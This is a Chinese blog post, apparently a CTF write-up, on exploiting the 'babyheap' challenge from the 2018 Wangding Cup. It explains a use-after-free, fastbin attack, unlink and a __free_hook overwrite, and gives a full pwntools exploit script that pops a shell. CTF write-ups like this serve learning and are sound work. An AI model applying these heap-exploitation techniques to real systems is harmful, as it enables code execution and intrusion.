<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">



<title>
  
    网鼎杯第一场预选 babyheap
  
</title>

<meta name="description" content="前言参加第一场，侥幸做出两道pwn和签到就进了前50。。貌似自己是前五十做题数量最少的。。时间不够就做出两道babyheap及GUESS。分数全靠babyheap来的。。">
<meta name="keywords" content="CTF">
<meta property="og:type" content="article">
<meta property="og:title" content="网鼎杯第一场预选 babyheap">
<meta property="og:url" content="http://yoursite.com/2018/08/20/网鼎杯第一场预选-babyheap/index.html">
<meta property="og:site_name" content="pwndog&#39;s blog">
<meta property="og:description" content="前言参加第一场，侥幸做出两道pwn和签到就进了前50。。貌似自己是前五十做题数量最少的。。时间不够就做出两道babyheap及GUESS。分数全靠babyheap来的。。">
<meta property="og:locale" content="CN">
<meta property="og:image" content="http://yoursite.com/2018/08/20/网鼎杯第一场预选-babyheap/1.jpg">
<meta property="og:image" content="http://yoursite.com/2018/08/20/网鼎杯第一场预选-babyheap/2.png">
<meta property="og:image" content="http://yoursite.com/2018/08/20/网鼎杯第一场预选-babyheap/3.png">
<meta property="og:image" content="http://yoursite.com/2018/08/20/网鼎杯第一场预选-babyheap/4.png">
<meta property="og:image" content="http://yoursite.com/2018/08/20/网鼎杯第一场预选-babyheap/5.png">
<meta property="og:image" content="http://yoursite.com/2018/08/20/网鼎杯第一场预选-babyheap/6.png">
<meta property="og:image" content="http://yoursite.com/2018/08/20/网鼎杯第一场预选-babyheap/7.png">
<meta property="og:image" content="http://yoursite.com/2018/08/20/网鼎杯第一场预选-babyheap/8.png">
<meta property="og:image" content="http://yoursite.com/2018/08/20/网鼎杯第一场预选-babyheap/9.png">
<meta property="og:image" content="http://yoursite.com/2018/08/20/网鼎杯第一场预选-babyheap/10.png">
<meta property="og:image" content="http://yoursite.com/2018/08/20/网鼎杯第一场预选-babyheap/11.png">
<meta property="og:image" content="http://yoursite.com/2018/08/20/网鼎杯第一场预选-babyheap/12.png">
<meta property="og:image" content="http://yoursite.com/2018/08/20/网鼎杯第一场预选-babyheap/13.png">
<meta property="og:image" content="http://yoursite.com/2018/08/20/网鼎杯第一场预选-babyheap/14.png">
<meta property="og:image" content="http://yoursite.com/2018/08/20/网鼎杯第一场预选-babyheap/15.png">
<meta property="og:updated_time" content="2018-08-21T14:42:17.419Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="网鼎杯第一场预选 babyheap">
<meta name="twitter:description" content="前言参加第一场，侥幸做出两道pwn和签到就进了前50。。貌似自己是前五十做题数量最少的。。时间不够就做出两道babyheap及GUESS。分数全靠babyheap来的。。">
<meta name="twitter:image" content="http://yoursite.com/2018/08/20/网鼎杯第一场预选-babyheap/1.jpg">


  <link rel="alternative" href="/atom.xml" title="pwndog&#39;s blog" type="application/atom+xml">



  <link rel="icon" href="/favicon.png">


<link rel="stylesheet" href="/perfect-scrollbar/css/perfect-scrollbar.min.css">
<link rel="stylesheet" href="/styles/main.css">






</head>
<body
  
    class="monochrome"
  
  >
  <div class="mobile-header">
  <button class="sidebar-toggle" type="button">
    <span class="icon-bar"></span>
    <span class="icon-bar"></span>
    <span class="icon-bar"></span>
  </button>
  <a class="title" href="/">pwndog&#39;s blog</a>
</div>

  <div class="main-container">
    <div class="sidebar">
  <div class="header">
    <h1 class="title"><a href="/">pwndog&#39;s blog</a></h1>
    
      <p class="subtitle">
        welcome
      </p>
    
    <div class="info">
      <div class="content">
        
          <div class="description">qq1015138407</div>
        
        
          <div class="author">zzm</div>
        
      </div>
      
        <div class="avatar">
          
            <a href="/about"><img src="https://cn.gravatar.com/avatar/35fef74d731255cd569c2c2b0b9e87e4?s=200"></a>
          
        </div>
      
    </div>
  </div>
  <div class="body">
    
      
        <ul class="nav">
          
            
              <li class="category-list-container">
                <a href="javascript:;">分类</a>
                <ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/glibc源码阅读/">glibc源码阅读</a><span class="category-list-count">1</span></li></ul>
              </li>
            
          
            
              <li class="tag-list-container">
                <a href="javascript:;">标签</a>
                <ul class="tag-list"><li class="tag-list-item"><a class="tag-list-link" href="/tags/CTF/">CTF</a><span class="tag-list-count">11</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/GLIBC/">GLIBC</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/windows/">windows</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/堆/">堆</a><span class="tag-list-count">1</span></li></ul>
              </li>
            
          
            
              <li class="archive-list-container">
                <a href="javascript:;">归档</a>
                <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2018/">2018</a><span class="archive-list-count">13</span></li></ul>
              </li>
            
          
        </ul>
      
        <ul class="nav">
          
            
              <li>
                <a href="/" title="Homepage">Homepage</a>
              </li>
            
          
            
              <li>
                <a href="/archives" title="By Year">By Year</a>
              </li>
            
          
        </ul>
      
        <ul class="nav">
          
            
              <li>
                <a href="https://github.com/denjones/hexo-theme-chan" title="Chan" target="_blank" rel="noopener">Chan</a>
              </li>
            
          
            
              <li>
                <a href="https://github.com/denjones" title="Github" target="_blank" rel="noopener">Github</a>
              </li>
            
          
            
              <li>
                <a href="/atom.xml" title="RSS">RSS</a>
              </li>
            
          
        </ul>
      
    
  </div>
</div>

    <div class="main-content">
      
        <div style="max-width: 1000px">
      
          <article id="post-网鼎杯第一场预选-babyheap" class="article article-type-post">
  
    <h1 class="article-header">
      网鼎杯第一场预选 babyheap
    </h1>
  
  

  <div class="article-info">
    <span class="article-date">
  2018-08-20
</span>

    

    
	<span class="article-tag tagcloud">
		<ul class="article-tag-list"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/CTF/">CTF</a></li></ul>
	</span>


  </div>
  <div class="article-entry">
    <h3 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h3><p>参加第一场，侥幸做出两道pwn和签到就进了前50。。貌似自己是前五十做题数量最少的。。时间不够就做出两道babyheap及GUESS。分数全靠babyheap来的。。<br><img src="/2018/08/20/网鼎杯第一场预选-babyheap/1.jpg" alt=""><br><a id="more"></a></p>
<h3 id="程序保护"><a href="#程序保护" class="headerlink" title="程序保护"></a>程序保护</h3><p><img src="/2018/08/20/网鼎杯第一场预选-babyheap/2.png" alt=""><br>程序除了没开启pie其他保护都已开启。</p>
<h3 id="程序功能"><a href="#程序功能" class="headerlink" title="程序功能"></a>程序功能</h3><p><img src="/2018/08/20/网鼎杯第一场预选-babyheap/3.png" alt=""><br>很全面的菜单题。有create，edit，show，free功能。<br><img src="/2018/08/20/网鼎杯第一场预选-babyheap/4.png" alt=""><br>create功能，能创建10个大小为0x30的堆块。并能进行写入。无漏洞点。<br><img src="/2018/08/20/网鼎杯第一场预选-babyheap/5.png" alt=""><br>edit功能。每次edit会使dword_6020B0值+1.当dword_6020B0值为3时，不能进行edit。作用是限制只能进行三次edit。无漏洞点。<br><img src="/2018/08/20/网鼎杯第一场预选-babyheap/6.png" alt=""><br>show功能，输出堆块内容。用于信息泄露<br><img src="/2018/08/20/网鼎杯第一场预选-babyheap/7.png" alt=""><br>free功能。free功能存在明显的UAF漏洞，悬挂指针未请空。free功能无限制，可以任意次数的free。</p>
<h3 id="利用思路"><a href="#利用思路" class="headerlink" title="利用思路"></a>利用思路</h3><p>程序存在UAF漏洞，难题在于如何通过10次0x30大小的堆块创建及三次的edit完成内存的写入及信息的泄露。<br>这里先考虑如何完成内存写的问题。malloc的大小被固定，于是fastbin attack不可行。<br>再考虑unlink。程序未开启PIE，且存在edit功能，若我们能实现unlink，就可以写入保存堆块的地址，实现任意地址写。<br>但是fast chunk不存在unlink，我们需要free两个small chunk。这里我们可以通过在堆块的特定部分写入0x31实现fastbin attack写入下一个堆块头。使三个0x30chunk组成一个0x91的chunk，free掉。就可以实现unlink。unlink后还要突破edit次数为3的限制。下一部分仔细说。这里总结思路。<br>首先通过fastbin泄露堆的地址。通过堆的地址及UAF漏洞实现fastbin attack，修改特定堆块的size为0x91。<br>最终实现0x91  fd  bk。。。。。。0x90  0x90<br>free下面的堆块实现unlink，此时就可以向保存堆块的数组写入。<br>因为在上面构造过程会使用掉edit的次数。所以我们需要突破edit的限制。即修改dword_6020B0值不为3.<br>之后就可以向free_hook写入system。free掉bin/sh。完成利用。</p>
<h3 id="利用过程"><a href="#利用过程" class="headerlink" title="利用过程"></a>利用过程</h3><h4 id="1-通过fastbin泄露堆的地址。"><a href="#1-通过fastbin泄露堆的地址。" class="headerlink" title="1.通过fastbin泄露堆的地址。"></a>1.通过fastbin泄露堆的地址。</h4><p>a=malloc（0x20）<br>b=malloc（0x20）<br>c=malloc（0x20）//防止和top chunk合并<br>free(b)<br>free(a)//先free a会导致最低位为0x0.输出不出来<br>show（b）//泄露出heap的地址。</p>
<h4 id="2-通过堆的地址及UAF漏洞实现fastbin-attack"><a href="#2-通过堆的地址及UAF漏洞实现fastbin-attack" class="headerlink" title="2.通过堆的地址及UAF漏洞实现fastbin attack"></a>2.通过堆的地址及UAF漏洞实现fastbin attack</h4><p>a=create（0x20,p64(0x31)<em>3）<br>b=create（0x20）<br>c=create（0x20）<br>free(b)<br>edit(b,&amp;a+0x10)<br>d=create（0x20）<br>e=create（0x20）<br>就可以覆盖c的堆块头。这里消耗两次edit制造两次fastbin attack。<br>构造过程如下<br>create(1,p64(0x31)</em>3+chr(0x31))<br>create(2,’/bin/sh’)<br>create(3,’’)<br>create(4,p64(0x31)*3)<br>create(5,’’)<br>create(6,’’)<br>create(7,’’)<br>先创造7个堆块<br><img src="/2018/08/20/网鼎杯第一场预选-babyheap/8.png" alt=""><br>free 3和2进行堆地址泄露<br><img src="/2018/08/20/网鼎杯第一场预选-babyheap/9.png" alt=""><br><img src="/2018/08/20/网鼎杯第一场预选-babyheap/10.png" alt=""><br>通过两次edit和两次create实现如图构造。已使用10次create及2次edit<br><img src="/2018/08/20/网鼎杯第一场预选-babyheap/11.png" alt=""><br><img src="/2018/08/20/网鼎杯第一场预选-babyheap/12.png" alt=""><br>查看发现地址已被修改。但是并不能通过edit修改突破edit的限制。。。。因为即便是以数组最后一项来unlink。能写入的范围也只能到数组最后一项。（只能写入0x20大小）最坑的地方。。。。但还是必须要以数组最后一项来unlink。（伪造堆块用）<br>我们只剩一次edit的机会。除了free没有别的可以利用。233，我们通过edit伪造数组最后两项为chunk的pre_size和size伪造一个堆块。size为heap地址-0x6020a0+1。这样free，堆块1为fast chunk 不会unlink。会将伪造chunk当作一个巨大的unsorted bin chunk。。。<br><img src="/2018/08/20/网鼎杯第一场预选-babyheap/13.png" alt=""><br>这时dword_6020B0的值被修改为unsorted bin的地址。。。顺便地址泄露出libc基址。。还真的一点不浪费。上面没有机会再free（create和edit次数不够）。<br>此时edit的限制也被突破。<br><img src="/2018/08/20/网鼎杯第一场预选-babyheap/14.png" alt=""><br>常规思路修改free_hook为system。free2.拿到flag<br><img src="/2018/08/20/网鼎杯第一场预选-babyheap/15.png" alt=""></p>
<h3 id="脚本"><a href="#脚本" class="headerlink" title="脚本"></a>脚本</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">p=process([<span class="string">'./babyheap'</span>],env=&#123;<span class="string">'LD_PRELOAD'</span>:<span class="string">'./libc.so.6'</span>&#125;,aslr=<span class="string">'FALSE'</span>)</span><br><span class="line"><span class="comment">#p=remote('106.75.67.115',9999)</span></span><br><span class="line">e=ELF(<span class="string">'./libc.so.6'</span>)</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">create</span><span class="params">(a,b)</span>:</span></span><br><span class="line">	p.writeline(<span class="string">'1'</span>)</span><br><span class="line">	p.readuntil(<span class="string">'Index:'</span>)</span><br><span class="line">	p.writeline(str(a))</span><br><span class="line">	p.readuntil(<span class="string">'Content:'</span>)</span><br><span class="line">	p.writeline(b)</span><br><span class="line">	p.readuntil(<span class="string">'Choice:'</span>)</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">dele</span><span class="params">(a)</span>:</span></span><br><span class="line">	p.writeline(<span class="string">'4'</span>)</span><br><span class="line">	p.readuntil(<span class="string">'Index:'</span>)</span><br><span class="line">	p.writeline(str(a))</span><br><span class="line">	p.readuntil(<span class="string">'Choice:'</span>)</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">edit</span><span class="params">(a,b)</span>:</span></span><br><span class="line">	p.writeline(<span class="string">'2'</span>)</span><br><span class="line">	p.readuntil(<span class="string">'Index:'</span>)</span><br><span class="line">	p.writeline(str(a))</span><br><span class="line">	p.readuntil(<span class="string">'Content:'</span>)</span><br><span class="line">	p.writeline(b)</span><br><span class="line">	p.readuntil(<span class="string">'Choice:'</span>)</span><br><span class="line">context(log_level=<span class="string">'debug'</span>)</span><br><span class="line">p.readuntil(<span class="string">'Choice:'</span>)</span><br><span class="line">create(<span class="number">1</span>,p64(<span class="number">0x31</span>)*<span class="number">3</span>+chr(<span class="number">0x31</span>))</span><br><span class="line">create(<span class="number">2</span>,<span class="string">'/bin/sh'</span>)</span><br><span class="line">create(<span class="number">3</span>,<span class="string">''</span>)</span><br><span class="line">create(<span class="number">4</span>,p64(<span class="number">0x31</span>)*<span class="number">3</span>)</span><br><span class="line">create(<span class="number">5</span>,<span class="string">''</span>)</span><br><span class="line">create(<span class="number">6</span>,<span class="string">''</span>)</span><br><span class="line">create(<span class="number">7</span>,<span class="string">''</span>)</span><br><span class="line">dele(<span class="number">2</span>)</span><br><span class="line">dele(<span class="number">3</span>)</span><br><span class="line">p.writeline(<span class="string">'3'</span>)</span><br><span class="line">p.readuntil(<span class="string">'Index:'</span>)</span><br><span class="line">p.writeline(<span class="string">'3'</span>)</span><br><span class="line">heap=u64((p.readuntil(<span class="string">'\n'</span>)[:<span class="number">-1</span>]).ljust(<span class="number">8</span>,chr(<span class="number">0x0</span>)))<span class="number">-0x30</span></span><br><span class="line"><span class="keyword">print</span> hex(heap)</span><br><span class="line">edit(<span class="number">3</span>,p64(heap+<span class="number">0xa0</span>))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">zz=p64(<span class="number">0x90</span>)*<span class="number">3</span>+chr(<span class="number">0x90</span>)</span><br><span class="line">create(<span class="number">8</span>,<span class="string">''</span>)</span><br><span class="line">edit(<span class="number">4</span>,p64(<span class="number">0x31</span>)*<span class="number">2</span>+p64(heap+<span class="number">0x20</span>))</span><br><span class="line"></span><br><span class="line">create(<span class="number">0</span>,zz)</span><br><span class="line"></span><br><span class="line">zz=p64(<span class="number">0x0</span>)+p64(<span class="number">0x91</span>)+p64(<span class="number">0x6020a8</span><span class="number">-0x18</span>)+p32(<span class="number">0x6020a8</span><span class="number">-0x10</span>)</span><br><span class="line">create(<span class="number">9</span>,zz)</span><br><span class="line"></span><br><span class="line">dele(<span class="number">5</span>)</span><br><span class="line"></span><br><span class="line">edit(<span class="number">9</span>,p64(<span class="number">0x6020b0</span>)+p64(<span class="number">0x6020a0</span>)+p64(<span class="number">0</span>)+p32(heap<span class="number">-0x6020a0</span>+<span class="number">1</span>))</span><br><span class="line">dele(<span class="number">6</span>)</span><br><span class="line">gdb.attach(p)</span><br><span class="line">p.writeline(<span class="string">'3'</span>)</span><br><span class="line">p.readuntil(<span class="string">'Index:'</span>)</span><br><span class="line">p.writeline(<span class="string">'6'</span>)</span><br><span class="line">libc=u64((p.readuntil(<span class="string">'\n'</span>)[:<span class="number">-1</span>]).ljust(<span class="number">8</span>,chr(<span class="number">0x0</span>)))<span class="number">-0x3C4B78</span></span><br><span class="line"><span class="keyword">print</span> hex(libc)</span><br><span class="line">system=libc+e.symbols[<span class="string">'system'</span>]</span><br><span class="line">free_hook=libc+e.symbols[<span class="string">'__free_hook'</span>]</span><br><span class="line">edit(<span class="number">7</span>,p64(free_hook))</span><br><span class="line">edit(<span class="number">8</span>,p64(system))</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<h3 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h3><p>这道题出的真的好，我觉得我做的应该是预期解。非常极限。网鼎杯质量真的不错（可能是自己太菜）。有错误或更简单的做法欢迎交流。进前50还是很开心。有re大佬让抱腿就好了哎23333</p>

  </div>
  <footer class="article-footer">
    
  <div class="cc">
    <a href="http://creativecommons.org/licenses/by-sa/4.0/deed.C" target="_blank" title="署名-相同方式共享">
      <img src="/images/cc/cc.png">
      
          <img src="/images/cc/by.png">
        
          <img src="/images/cc/sa.png">
      
      <span>
        本作品采用知识共享 署名-相同方式共享 4.0 国际许可协议进行许可。
      </span>
    </a>
  </div>


    

  </footer>
</article>







          <div class="main-footer">
  
    © 2018 pwndog&#39;s blog - Powered by <a href="http://hexo.io" target="_blank">Hexo</a> - Theme <a href="https://github.com/denjones/hexo-theme-chan" target="_blank">Chan</a>
  
</div>

      
        </div>
      
    </div>
  </div>
  <script src="//apps.bdimg.com/libs/jquery/2.1.4/jquery.min.js"></script>

  <link rel="stylesheet" href="/PhotoSwipe/photoswipe.css">
  <link rel="stylesheet" href="/PhotoSwipe/default-skin/default-skin.css">

  <!-- Root element of PhotoSwipe. Must have class pswp. -->
  <div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">

    <!-- Background of PhotoSwipe.
             It's a separate element as animating opacity is faster than rgba(). -->
    <div class="pswp__bg"></div>

    <!-- Slides wrapper with overflow:hidden. -->
    <div class="pswp__scroll-wrap">

      <!-- Container that holds slides.
                PhotoSwipe keeps only 3 of them in the DOM to save memory.
                Don't modify these 3 pswp__item elements, data is added later on. -->
      <div class="pswp__container">
        <div class="pswp__item"></div>
        <div class="pswp__item"></div>
        <div class="pswp__item"></div>
      </div>

      <!-- Default (PhotoSwipeUI_Default) interface on top of sliding area. Can be changed. -->
      <div class="pswp__ui pswp__ui--hidden">

        <div class="pswp__top-bar">

          <!--  Controls are self-explanatory. Order can be changed. -->

          <div class="pswp__counter"></div>

          <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>

          <button class="pswp__button pswp__button--share" title="Share"></button>

          <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>

          <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>

          <!-- Preloader demo http://codepen.io/dimsemenov/pen/yyBWoR -->
          <!-- element will get class pswp__preloader--active when preloader is running -->
          <div class="pswp__preloader">
            <div class="pswp__preloader__icn">
              <div class="pswp__preloader__cut">
                <div class="pswp__preloader__donut"></div>
              </div>
            </div>
          </div>
        </div>

        <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
          <div class="pswp__share-tooltip"></div>
        </div>

        <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)"></button>

        <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)"></button>

        <div class="pswp__caption">
          <div class="pswp__caption__center"></div>
        </div>
      </div>
    </div>
  </div>

  <script src="/PhotoSwipe/photoswipe.js"></script>
  <script src="/PhotoSwipe/photoswipe-ui-default.js"></script>


<script src="/perfect-scrollbar/js/min/perfect-scrollbar.min.js"></script>
<script src="/scripts/main.js"></script>

</body>
</html>
